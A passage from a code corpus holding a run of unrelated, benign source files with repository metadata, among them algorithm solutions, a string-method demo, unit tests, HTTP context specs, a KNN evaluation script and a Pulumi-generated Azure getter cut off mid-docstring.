[] |
no_license
|
cndqjacndqja/algorithm_python
|
202f9990ea367629aecdd14304201eb6fa2aa37e
|
843269cdf8fb9d4c215c92a97fc2d007a8f96699
|
refs/heads/master
| 2023-06-24T08:12:29.639424
| 2021-07-24T05:08:46
| 2021-07-24T05:08:46
| 255,552,956
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 647
|
py
|
from heapq import heappush, heappop
INF = int(1e9)
def solution(n, start, end, roads, traps):
data = [[] for _ in range(n+1)]
for i in roads:
a, b, c = i
data[a].append((b, c))
def dijkstra(start, end, n, data):
distance = [INF for _ in range(n+1)]
distance[start] = 0
q = []
heappush(q, (0, start))
while q:
dis, node = heappop(q)
if distance[node] < dis:
continue
for i in data[node]:
cost = dis + i[1]
if distance[i[0]] > cost:
heappush(q, (cost, i[0]))
distance[i[0]] = cost
        return distance[end]
    # Note: `traps` from the original problem is not handled here; return the
    # plain shortest path so the function at least produces a result.
    return dijkstra(start, end, n, data)
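# Minimal usage sketch (hypothetical inputs; the contest's trap mechanic is
# not modelled above):
if __name__ == '__main__':
    roads = [(1, 2, 3), (2, 3, 4), (1, 3, 10)]
    print(solution(3, 1, 3, roads, []))  # -> 7, via 1 -> 2 -> 3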
|
[
"cndqjacndqja@gmail.com"
] |
cndqjacndqja@gmail.com
|
4489ddbba60f18b2f96f68362668c0918617c6d0
|
e96cc817c768915eeff46027ded14e759e8042ff
|
/Python基础/字符串/判断.py
|
a08d4cb40f7a539f93ede6b04ae4724cf9c0e573
|
[] |
no_license
|
fovegage/learn-python
|
e22a32207cf513ba0f8c3428e9c00138987c2359
|
93b8d3513769a0b7d492a7b515f289fe3f1efc4a
|
refs/heads/master
| 2023-06-08T13:44:57.274677
| 2023-05-29T05:52:35
| 2023-05-29T05:52:35
| 148,493,932
| 6
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,187
|
py
|
# -*- coding: utf-8 -*-
# @Time : 2018/12/27 14:45
# @Author : fovegage
# @Email : fovegage@gmail.com
# @File : 判断.py
# @Software: PyCharm
# islower: checks letters only
str = 'hello'
print(str.islower())
# isalnum(): whether the string consists only of digits and letters
str = 'jjjssss22'
print(str.isalnum())
# isalpha(): whether the string contains letters only; anything outside the 26 letters makes it False
str = 'sjsksk'
print(str.isalpha())
# isdecimal(): returns True if every character is a decimal digit, otherwise False
demo = '1234'
print(demo.isdecimal())
# isidentifier(): whether the string is a valid Python identifier,
# i.e. letters, digits and underscores, not starting with a digit
str = '90'
print(str.isidentifier())  # False
# islower(): whether all cased characters are lowercase
str = 'Tskksks'
print(str.islower())  # False
# isdigit(): whether every character is a digit
num = '999'
print(num.isdigit())
# isspace(): returns True for whitespace (space or tab), otherwise False;
# note that '' and ' ' are not the same
str = '\t'
print(str.isspace())
# istitle(): whether the string is titlecased (each word starts with an uppercase letter)
str = 'dTg'
print(str.istitle())
# isnumeric(): returns True if every character is numeric; a stronger isdigit() that also accepts '²3455'
s = '\u00B23455'
print(repr(s))
print(s.isnumeric())
|
[
"fovegage@gmail.com"
] |
fovegage@gmail.com
|
de75179eb73337e3b223f1e9b50d70bc2438f591
|
b2d2ce1752ec5ea39b70ae37551bc162a748b469
|
/tests/unit/pypyraws/version_test.py
|
4ec7ddabcd59da582daa199da4ef6a25a4c6a7b9
|
[
"Apache-2.0"
] |
permissive
|
AvdN/pypyr-aws
|
05c28abb904e2f71a0fbdaacaeaf20b458f97c52
|
96477b2deb46b6db73fa6d64f1350991dd378c31
|
refs/heads/master
| 2021-01-24T06:46:41.130069
| 2017-06-02T15:03:15
| 2017-06-02T15:03:15
| 93,318,585
| 0
| 0
| null | 2017-06-04T14:23:52
| 2017-06-04T14:23:52
| null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
"""version.py unit tests."""
import pypyraws.version
import platform
def test_get_version():
actual = pypyraws.version.get_version()
expected = (f'pypyraws {pypyraws.version.__version__} '
f'python {platform.python_version()}')
assert actual == expected, "version not returning correctly"
|
[
"thomas@345.systems"
] |
thomas@345.systems
|
da5e68cfc1a7005a1e829bc6a913fac6fd2f1f7d
|
1e263d605d4eaf0fd20f90dd2aa4174574e3ebce
|
/components/ally-http/ally/http/spec/server.py
|
6712ab685dee0fe68395d0005537a4483bf101b2
|
[] |
no_license
|
galiminus/my_liveblog
|
698f67174753ff30f8c9590935d6562a79ad2cbf
|
550aa1d0a58fc30aa9faccbfd24c79a0ceb83352
|
refs/heads/master
| 2021-05-26T20:03:13.506295
| 2013-04-23T09:57:53
| 2013-04-23T09:57:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,564
|
py
|
'''
Created on Jun 1, 2012
@package: ally http
@copyright: 2012 Sourcefabric o.p.s.
@license: http://www.gnu.org/licenses/gpl-3.0.txt
@author: Gabriel Nistor
Provides HTTP server specification.
'''
from ally.design.context import Context, defines, requires, optional
from ally.support.util_io import IInputStream
from collections import Iterable
import abc
# --------------------------------------------------------------------
# HTTP methods.
METHOD_GET = 'GET'
METHOD_DELETE = 'DELETE'
METHOD_POST = 'POST'
METHOD_PUT = 'PUT'
METHOD_OPTIONS = 'OPTIONS'
METHOD_UNKNOWN = 'UNKNOWN'
METHODS = frozenset((METHOD_GET, METHOD_DELETE, METHOD_POST, METHOD_PUT, METHOD_OPTIONS))
# --------------------------------------------------------------------
class RequestHTTP(Context):
'''
Context for HTTP request data.
'''
# ---------------------------------------------------------------- Defined
scheme = defines(str, doc='''
@rtype: string
The scheme URI protocol name to be used for the response.
''')
methodName = defines(str, doc='''
@rtype: string
The HTTP method name of the request.
''')
uriRoot = defines(str, doc='''
@rtype: string
The root URI to be considered for constructing a request path, basically the relative path root.
''')
uri = defines(str, doc='''
@rtype: string
The relative request URI.
''')
parameters = defines(list, doc='''
@rtype: list[tuple(string, string)]
The parameters of the request.
''')
headers = defines(dict, doc='''
@rtype: dictionary{string, string}
The raw headers.
''')
class RequestContentHTTP(Context):
'''
Context for HTTP request content data.
'''
# ---------------------------------------------------------------- Defined
source = defines(IInputStream, doc='''
@rtype: IInputStream
The source for the request content.
''')
class ResponseHTTP(Context):
'''
Context for HTTP response data.
'''
# ---------------------------------------------------------------- Required
code = requires(int, doc='''
@rtype: integer
The HTTP response code.
''')
isSuccess = requires(bool, doc='''
@rtype: boolean
True if the response is a success, False otherwise.
''')
# ---------------------------------------------------------------- Optional
text = optional(str, doc='''
@rtype: str
The response text message (a short message).
''')
headers = optional(dict, doc='''
        @rtype: dictionary{string, string}
The response headers.
''')
class ResponseContentHTTP(Context):
'''
Context for HTTP response content data.
'''
# ---------------------------------------------------------------- Required
source = requires(IInputStream, Iterable, doc='''
@rtype: IInputStream|Iterable
The source for the response content.
''')
# --------------------------------------------------------------------
class IDecoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header retrieve, parsing and decoding.
'''
@abc.abstractmethod
def retrieve(self, name):
'''
Get the raw header value.
@param name: string
The name of the header to retrieve.
@return: string|None
The raw header value or None if there is no such header.
'''
@abc.abstractmethod
def decode(self, name):
'''
Get the decoded the header value.
@param name: string
The name of the header to decode.
@return: list[tuple(string, dictionary{string:string})]
A list of tuples having as the first entry the header value and the second entry a dictionary
with the value attribute.
'''
class IEncoderHeader(metaclass=abc.ABCMeta):
'''
Provides the header encoding.
'''
@abc.abstractmethod
def encode(self, name, *value):
'''
Encodes the header values.
ex:
            encode('multipart/formdata', 'mixed') == 'multipart/formdata, mixed'
            encode(('multipart/formdata', ('charset', 'utf-8'), ('boundary', '12'))) ==
                'multipart/formdata; charset=utf-8; boundary=12'
@param name: string
The name of the header to set.
@param value: arguments[tuple(string, tuple(string, string))|string]
            Tuples containing as the first entry the value found in the header and as the second
            entry a tuple with the value's attributes.
'''
|
[
"etienne@spillemaeker.com"
] |
etienne@spillemaeker.com
|
db7daaad0a903a177dcefeb07c6912390cdeb411
|
b5fa959a5a1a6cd1e5027e41ed45b6dfb1c19151
|
/testapp/tests/test_models.py
|
63eb981a166d436d958ec9b87a1b3dde0dbd614a
|
[
"MIT"
] |
permissive
|
Mikekh84/learning-journal
|
13c8e036620d4286f7e6bf3c1d9df0c5e0d368d8
|
d0d5af7913790ab895a2fa530aa259cf2934f49b
|
refs/heads/master
| 2021-01-17T17:12:15.009156
| 2016-03-28T02:50:48
| 2016-03-28T02:50:48
| 54,362,834
| 0
| 1
| null | 2016-03-28T02:50:48
| 2016-03-21T05:43:15
|
Python
|
UTF-8
|
Python
| false
| false
| 511
|
py
|
# -*- coding: utf-8 -*-
from testapp.models import Entry, DBSession, render_markdown
def test_create_entry(dbtransaction):
"""Test for a change of state of the model."""
new_model = Entry(title="jill", text='jello')
assert new_model.id is None
DBSession.add(new_model)
DBSession.flush()
assert new_model.id is not None
def test_render_markdown():
"""Assert render markdown works."""
content = 'Hello'
output = render_markdown(content)
assert output == '<p>Hello</p>'
|
[
"nadia.bahrami@gmail.com"
] |
nadia.bahrami@gmail.com
|
e218ccbde421b4913b280795d031f3fc87789818
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_199/773.py
|
30a001a8f7c676f7eb2fe925665c826df0915c48
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 705
|
py
|
# Problem A. Oversized Pancake Flipper
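# Greedy: scan left to right; the leftmost '-' pancake can only be fixed by a
# flip that starts at it, so flip the K-pancake window there and count flips.
# If such a window would run past the end, the case is IMPOSSIBLE.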
import os
SOURCE = '%s/../Resources/Q1Al.in' % os.path.dirname(__file__)
TARGET = '%s/../Resources/Q1Al.out' % os.path.dirname(__file__)
INPUT = open(SOURCE).read().splitlines()
OUTPUT = open(TARGET, 'w')
T = int(INPUT.pop(0))
for t0 in xrange(T):
print >> OUTPUT, 'Case #%d:' % (t0 + 1),
S, K = INPUT.pop(0).split()
A, K = ['+' == s for s in S], int(K)
L = len(A)
r = 0
for i, a in enumerate(A):
if not a:
if i + K > L:
print >> OUTPUT, 'IMPOSSIBLE'
break
r += 1
for k in xrange(K):
A[i+k] = not A[i+k]
else:
print >> OUTPUT, r
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
30bab34cfeff4c18f9f343631ed0cdb6410ae39a
|
baf3996414315ffb60470c40c7ad797bf4e6897f
|
/02_ai/1_ml/3_data_preparation/code/chapter_18/02_model_evaluation.py
|
c6093bdc54ef4415a5811861005577357adb543d
|
[
"MIT"
] |
permissive
|
thiago-allue/portfolio
|
8fbbecca7ce232567aebe97c19944f444508b7f4
|
0acd8253dc7c5150fef9b2d46eead3db83ca42de
|
refs/heads/main
| 2023-03-15T22:10:21.109707
| 2022-09-14T17:04:35
| 2022-09-14T17:04:35
| 207,919,073
| 0
| 0
| null | 2019-11-13T18:18:23
| 2019-09-11T22:40:46
|
Python
|
UTF-8
|
Python
| false
| false
| 955
|
py
|
# evaluate knn on the raw diabetes dataset
from numpy import mean
from numpy import std
from pandas import read_csv
from sklearn.model_selection import cross_val_score
from sklearn.model_selection import RepeatedStratifiedKFold
from sklearn.neighbors import KNeighborsClassifier
from sklearn.preprocessing import LabelEncoder
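# Note: assumes 'pima-indians-diabetes.csv' (the Pima Indians Diabetes data,
# 8 numeric inputs plus a class label) sits in the working directory.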
# load dataset
dataset = read_csv('pima-indians-diabetes.csv', header=None)
data = dataset.values
# separate into input and output columns
X, y = data[:, :-1], data[:, -1]
# ensure inputs are floats and output is an integer label
X = X.astype('float32')
y = LabelEncoder().fit_transform(y.astype('str'))
# define and configure the model
model = KNeighborsClassifier()
# evaluate the model
cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=3, random_state=1)
n_scores = cross_val_score(model, X, y, scoring='accuracy', cv=cv, n_jobs=-1)
# report model performance
print('Accuracy: %.3f (%.3f)' % (mean(n_scores), std(n_scores)))
|
[
"thiago.allue@yahoo.com"
] |
thiago.allue@yahoo.com
|
7bf358f112e3ef7aa77ff185a38d1f372ce35085
|
163bbb4e0920dedd5941e3edfb2d8706ba75627d
|
/Code/data_analyze.py
|
1b53f51941b2a5bab76c5647d28bf9d31e0e44bf
|
[] |
no_license
|
AdamZhouSE/pythonHomework
|
a25c120b03a158d60aaa9fdc5fb203b1bb377a19
|
ffc5606817a666aa6241cfab27364326f5c066ff
|
refs/heads/master
| 2022-11-24T08:05:22.122011
| 2020-07-28T16:21:24
| 2020-07-28T16:21:24
| 259,576,640
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,937
|
py
|
"""
Data analysis.
See the research report for the detailed research process.
"""
import json
import pandas as pd
import numpy as np
from decimal import Decimal
pd.set_option('display.unicode.ambiguous_as_wide', True)
pd.set_option('display.unicode.east_asian_width', True)
def save_as_file(data: dict, filename):
with open(filename, 'w', encoding='utf-8')as json_file:
json.dump(data, json_file, ensure_ascii=False, indent=4)
def get_difficulty(data):
    d = []  # problem difficulty
    u = []  # upload rate
    li = []  # lines of code
    avg = []
    avg_all = []  # arithmetic mean of the pass rates
    num_of_cases = []
    for types in data.items():
        avg.append(types[1]["avg_pass_rate"])
        cor_pu = (types[1]["correlation_pu"])  # correlation between pass rate and upload rate
        cor_pl = (types[1]["correlation_pl"])  # correlation between pass rate and lines of code
        for cases in types[1].items():  # per category
if cases[0] == 'cases':
print(types[0], len(cases[1]))
num_of_cases.append([types[0], len(cases[1])])
for case in cases[1].items():
u.append(case[1]["up_rate"]*cor_pu)
li.append(case[1]["avg_lines"]*cor_pl)
                    d.append((1 - case[1]["pass_rate"]))  # 1 - this problem's pass rate
avg_all.append(case[1]["pass_rate"])
    # map onto the interval [1, 5]
    d1 = map_to(1, 5, d)  # problem difficulty after mapping
u1 = map_to(1, 5, u)
li1 = map_to(1, 5, li)
final_d = []
for i in range(0, len(d1)):
        # correct the raw difficulty using upload rate and lines of code
final_d.append(get_final_d(d1[i], u1[i], li1[i], 0.846, 0.084))
cnt_easy = 0
cnt_medium = 0
cnt_hard = 0
for di in final_d:
        if 1 <= di < 2.2:  # pass rate above 70%: easy
            cnt_easy += 1
        elif 2.2 <= di < 3.4:  # pass rate 40%-70%: medium
            cnt_medium += 1
        else:  # pass rate below 40%: hard
cnt_hard += 1
print("easy: ", cnt_easy, cnt_easy/882)
print("medium: ", cnt_medium, cnt_medium/882)
print("hard: ", cnt_hard, cnt_hard/882)
print("难度系数均值:", np.mean(final_d))
print("修正前通过率均值:", np.mean(avg_all))
print("修正后均值:", 1-np.mean(map_to(0, 1, final_d)))
print(avg)
return final_d
def get_final_d(k, m, n, alpha, beta):  # corrected difficulty coefficient
return alpha*k + beta*m + (1-alpha-beta)*n
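# Worked example (illustrative numbers): get_final_d(3.0, 2.0, 1.0, 0.846, 0.084)
# = 0.846*3.0 + 0.084*2.0 + 0.070*1.0 = 2.776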
def get_diff_by_degree(degree):  # difficulty label from the difficulty coefficient
if 1 <= degree < 2.2:
return "easy"
elif 2.2 <= degree < 3.4:
return "medium"
else:
return "hard"
def geometric_mean(data):  # geometric mean
total = 1
for i in data:
if i == 0:
continue
total *= Decimal(str(format(i, ".2f")))
# print(float(format(i, ".2f")))
return total ** Decimal(1.0/len(data))
def map_to(start, end, data):  # map data linearly onto the interval [start, end]
    d_min = np.min(data)
    d_max = np.max(data)
res = []
for d in data:
res.append(start+(end-start)/(d_max-d_min)*(d-d_min))
return res
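# Quick sanity check (illustrative values): map_to(1, 5, [0.0, 0.5, 1.0]) -> [1.0, 3.0, 5.0]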
def get_result(data, final_d):
res = {}
i = 0
for types in data.items():
if types[0] not in res.keys():
res[types[0]] = {"cases": types[1]}
for cid, case in types[1].items():
res[types[0]]["cases"][cid] = case
res[types[0]]["cases"][cid]["degree"] = final_d[i]
res[types[0]]["cases"][cid]["difficulty"] = get_diff_by_degree(final_d[i])
i += 1
print(i)
return res
if __name__ == "__main__":
with open("../Data/final_data_v2.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
final_data = get_difficulty(_data)
with open("../Data/final_data.json", 'r', encoding="utf-8") as f:
_data = json.loads(f.read())
result = get_result(_data, final_data)
# save_as_file(result, "../Data/result.json")
|
[
"1069583789@qq.com"
] |
1069583789@qq.com
|
c7f5f003abb3040b1524784d99a06585be3ae3cc
|
5afd733a5c1f753601c69b8b4eae1b49edfbae7c
|
/1-100/26.py
|
fa36e700d0e1f5ab060ef83dfb14183c587f6ef8
|
[] |
no_license
|
yanbinbi/leetcode
|
9dcd4a0160be915006455b83d6b7cd39e9819811
|
616a868bfa7bdd00195067b0477b0236a72d23e0
|
refs/heads/master
| 2021-05-13T19:34:17.222576
| 2017-11-12T02:04:31
| 2017-11-12T02:04:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
class Solution(object):
def removeDuplicates(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
size = len(nums)
if size == 0:
return 0
j = 0
for i in range(1,size):
if nums[i] > nums[j]:
j += 1
if i != j:
nums[j] = nums[i]
return j+1
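# Example: nums = [1, 1, 2] -> returns 2, with nums[:2] == [1, 2]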
|
[
"xukaifeng1986@gmail.com"
] |
xukaifeng1986@gmail.com
|
aa034bd935af2335c3c1651436ae7001c1fde500
|
a4525c981552117dabdf5f952ced15997199da32
|
/ask-smapi-model/ask_smapi_model/v1/skill/interaction_model/model_type/slot_type_definition_output.py
|
5a60b84255908d1a8d2553d4ce4a24b9d61f9ea7
|
[
"Apache-2.0"
] |
permissive
|
muskanmahajan37/alexa-apis-for-python
|
29b3b8e45bb009fa56ba0a2a73ed2f50efe77f65
|
8e0c90a3031f5afd8a2e62d19b51fe392e7da1af
|
refs/heads/master
| 2022-11-09T01:14:58.947495
| 2020-06-25T17:33:19
| 2020-06-25T17:33:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,919
|
py
|
# coding: utf-8
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for
# the specific language governing permissions and limitations under the License.
#
import pprint
import re # noqa: F401
import six
import typing
from enum import Enum
if typing.TYPE_CHECKING:
from typing import Dict, List, Optional, Union
from datetime import datetime
from ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input import SlotTypeInputV1
class SlotTypeDefinitionOutput(object):
"""
Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
deserialized_types = {
'slot_type': 'ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput',
'total_versions': 'str'
} # type: Dict
attribute_map = {
'slot_type': 'slotType',
'total_versions': 'totalVersions'
} # type: Dict
supports_multiple_types = False
def __init__(self, slot_type=None, total_versions=None):
# type: (Optional[SlotTypeInputV1], Optional[str]) -> None
"""Slot Type request definitions.
:param slot_type:
:type slot_type: (optional) ask_smapi_model.v1.skill.interaction_model.model_type.slot_type_input.SlotTypeInput
:param total_versions: Total number of versions.
:type total_versions: (optional) str
"""
self.__discriminator_value = None # type: str
self.slot_type = slot_type
self.total_versions = total_versions
def to_dict(self):
# type: () -> Dict[str, object]
"""Returns the model properties as a dict"""
result = {} # type: Dict
for attr, _ in six.iteritems(self.deserialized_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else
x.value if isinstance(x, Enum) else x,
value
))
elif isinstance(value, Enum):
result[attr] = value.value
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else
(item[0], item[1].value)
if isinstance(item[1], Enum) else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
# type: () -> str
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
# type: () -> str
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
# type: (object) -> bool
"""Returns true if both objects are equal"""
if not isinstance(other, SlotTypeDefinitionOutput):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
# type: (object) -> bool
"""Returns true if both objects are not equal"""
return not self == other
|
[
"ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com"
] |
ask-pyth@dev-dsk-ask-sdk-python-2b-85d79f62.us-west-2.amazon.com
|
46b7f2b1be3242b3a9fd4117a6a4d2ec15eabc2a
|
7cb646a87705156e9d6e0b651df4c0a90a99947b
|
/phy/io/mock/kwik.py
|
eed05ce223d2cfe13a1c77dd59cf3e8a4654db4d
|
[] |
no_license
|
cgestes/phy
|
1339b8ce46ac076129496745c23d87bfc73e6407
|
8bb7b9377e6376dce46ef123ccc97ecf3671fb15
|
refs/heads/master
| 2021-01-18T10:21:35.785483
| 2015-04-16T11:42:39
| 2015-04-16T13:51:57
| 30,656,835
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,009
|
py
|
# -*- coding: utf-8 -*-
"""Mock Kwik files."""
#------------------------------------------------------------------------------
# Imports
#------------------------------------------------------------------------------
import os.path as op
import numpy as np
from ...io.mock.artificial import (artificial_spike_samples,
artificial_spike_clusters,
artificial_features,
artificial_masks,
artificial_traces)
from ...electrode.mea import staggered_positions
from ..h5 import open_h5
from ..kwik_model import _kwik_filenames, _create_clustering
#------------------------------------------------------------------------------
# Mock Kwik file
#------------------------------------------------------------------------------
def create_mock_kwik(dir_path, n_clusters=None, n_spikes=None,
n_channels=None, n_features_per_channel=None,
n_samples_traces=None,
with_kwx=True, with_kwd=True):
"""Create a test kwik file."""
filename = op.join(dir_path, '_test.kwik')
filenames = _kwik_filenames(filename)
kwx_filename = filenames['kwx']
kwd_filename = filenames['raw.kwd']
# Create the kwik file.
with open_h5(filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
def _write_metadata(key, value):
f.write_attr('/application_data/spikedetekt', key, value)
_write_metadata('sample_rate', 20000.)
# Filter parameters.
_write_metadata('filter_low', 500.)
_write_metadata('filter_high', 0.95 * .5 * 20000.)
_write_metadata('filter_butter_order', 3)
_write_metadata('extract_s_before', 15)
_write_metadata('extract_s_after', 25)
_write_metadata('nfeatures_per_channel', n_features_per_channel)
# Create spike times.
spike_samples = artificial_spike_samples(n_spikes).astype(np.int64)
spike_recordings = np.zeros(n_spikes, dtype=np.uint16)
# Size of the first recording.
recording_size = 2 * n_spikes // 3
# Find the recording offset.
recording_offset = spike_samples[recording_size]
recording_offset += spike_samples[recording_size + 1]
recording_offset //= 2
spike_recordings[recording_size:] = 1
# Make sure the spike samples of the second recording start over.
spike_samples[recording_size:] -= spike_samples[recording_size]
spike_samples[recording_size:] += 10
if spike_samples.max() >= n_samples_traces:
raise ValueError("There are too many spikes: decrease 'n_spikes'.")
f.write('/channel_groups/1/spikes/time_samples', spike_samples)
f.write('/channel_groups/1/spikes/recording', spike_recordings)
f.write_attr('/channel_groups/1',
'channel_order',
np.arange(1, n_channels - 1)[::-1],
)
# Create channels.
positions = staggered_positions(n_channels)
for channel in range(n_channels):
group = '/channel_groups/1/channels/{0:d}'.format(channel)
f.write_attr(group, 'name', str(channel))
f.write_attr(group, 'position', positions[channel])
# Create spike clusters.
clusterings = [('main', n_clusters),
('automatic', n_clusters * 2),
]
for clustering, n_clusters_rec in clusterings:
spike_clusters = artificial_spike_clusters(n_spikes,
n_clusters_rec)
_create_clustering(f, clustering, 1, spike_clusters)
# Create recordings.
f.write_attr('/recordings/0', 'name', 'recording_0')
f.write_attr('/recordings/1', 'name', 'recording_1')
# Create the kwx file.
if with_kwx:
with open_h5(kwx_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
features = artificial_features(n_spikes,
(n_channels - 2) *
n_features_per_channel)
masks = artificial_masks(n_spikes,
(n_channels - 2) *
n_features_per_channel)
fm = np.dstack((features, masks)).astype(np.float32)
f.write('/channel_groups/1/features_masks', fm)
# Create the raw kwd file.
if with_kwd:
with open_h5(kwd_filename, 'w') as f:
f.write_attr('/', 'kwik_version', 2)
traces = artificial_traces(n_samples_traces, n_channels)
# TODO: int16 traces
f.write('/recordings/0/data',
traces[:recording_offset, ...].astype(np.float32))
f.write('/recordings/1/data',
traces[recording_offset:, ...].astype(np.float32))
return filename
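# Minimal usage sketch (hypothetical parameter values):
#
#   path = create_mock_kwik('/tmp', n_clusters=5, n_spikes=50, n_channels=8,
#                           n_features_per_channel=3, n_samples_traces=1000)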
|
[
"cyrille.rossant@gmail.com"
] |
cyrille.rossant@gmail.com
|
c72670766922c59f54f1e38c3251a93c3d29440e
|
8ed4bf9fbead471c9e5f88e4d18ac432ec3d628b
|
/hackerrank/algorithm/string/reduced_string.py
|
0fec6e1adc81c9b8b46f35b176b59a2b2e96024b
|
[] |
no_license
|
hizbul25/programming_problem
|
9bf26e49ed5bb8c9c829d00e765c9401222fb35c
|
2acca363704b993ffe5f6c2b00f81a4f4eca7204
|
refs/heads/master
| 2021-01-10T22:28:26.105787
| 2018-01-21T16:45:45
| 2018-01-21T16:45:45
| 65,394,734
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
py
|
# URL: https://www.hackerrank.com/challenges/reduced-string
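# e.g. 'aaabccddd' -> 'abd'; 'aabb' -> 'Empty String' (adjacent equal pairs cancel)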
s = input()
stack = []
for i in range(len(s)):
if not stack or s[i] != stack[-1]:
stack += [s[i]]
else:
stack.pop()
if stack:
print(''.join(stack))
else:
print('Empty String')
|
[
"hizbul.ku@gmail.com"
] |
hizbul.ku@gmail.com
|
c2f63be45f8a4ef6445fb0981f9ae21611bb6d46
|
82b946da326148a3c1c1f687f96c0da165bb2c15
|
/sdk/python/pulumi_azure_native/web/v20181101/get_web_app_swift_virtual_network_connection_slot.py
|
5279f9e04c7689c8359817ea2659e83821fa878c
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
morrell/pulumi-azure-native
|
3916e978382366607f3df0a669f24cb16293ff5e
|
cd3ba4b9cb08c5e1df7674c1c71695b80e443f08
|
refs/heads/master
| 2023-06-20T19:37:05.414924
| 2021-07-19T20:57:53
| 2021-07-19T20:57:53
| 387,815,163
| 0
| 0
|
Apache-2.0
| 2021-07-20T14:18:29
| 2021-07-20T14:18:28
| null |
UTF-8
|
Python
| false
| false
| 5,220
|
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
__all__ = [
'GetWebAppSwiftVirtualNetworkConnectionSlotResult',
'AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult',
'get_web_app_swift_virtual_network_connection_slot',
]
@pulumi.output_type
class GetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
Swift Virtual Network Contract. This is used to enable the new Swift way of doing virtual network integration.
"""
def __init__(__self__, id=None, kind=None, name=None, subnet_resource_id=None, swift_supported=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if kind and not isinstance(kind, str):
raise TypeError("Expected argument 'kind' to be a str")
pulumi.set(__self__, "kind", kind)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if subnet_resource_id and not isinstance(subnet_resource_id, str):
raise TypeError("Expected argument 'subnet_resource_id' to be a str")
pulumi.set(__self__, "subnet_resource_id", subnet_resource_id)
if swift_supported and not isinstance(swift_supported, bool):
raise TypeError("Expected argument 'swift_supported' to be a bool")
pulumi.set(__self__, "swift_supported", swift_supported)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Resource Id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def kind(self) -> Optional[str]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter
def name(self) -> str:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="subnetResourceId")
def subnet_resource_id(self) -> Optional[str]:
"""
The Virtual Network subnet's resource ID. This is the subnet that this Web App will join. This subnet must have a delegation to Microsoft.Web/serverFarms defined first.
"""
return pulumi.get(self, "subnet_resource_id")
@property
@pulumi.getter(name="swiftSupported")
def swift_supported(self) -> Optional[bool]:
"""
A flag that specifies if the scale unit this Web App is on supports Swift integration.
"""
return pulumi.get(self, "swift_supported")
@property
@pulumi.getter
def type(self) -> str:
"""
Resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult(GetWebAppSwiftVirtualNetworkConnectionSlotResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetWebAppSwiftVirtualNetworkConnectionSlotResult(
id=self.id,
kind=self.kind,
name=self.name,
subnet_resource_id=self.subnet_resource_id,
swift_supported=self.swift_supported,
type=self.type)
def get_web_app_swift_virtual_network_connection_slot(name: Optional[str] = None,
resource_group_name: Optional[str] = None,
slot: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetWebAppSwiftVirtualNetworkConnectionSlotResult:
"""
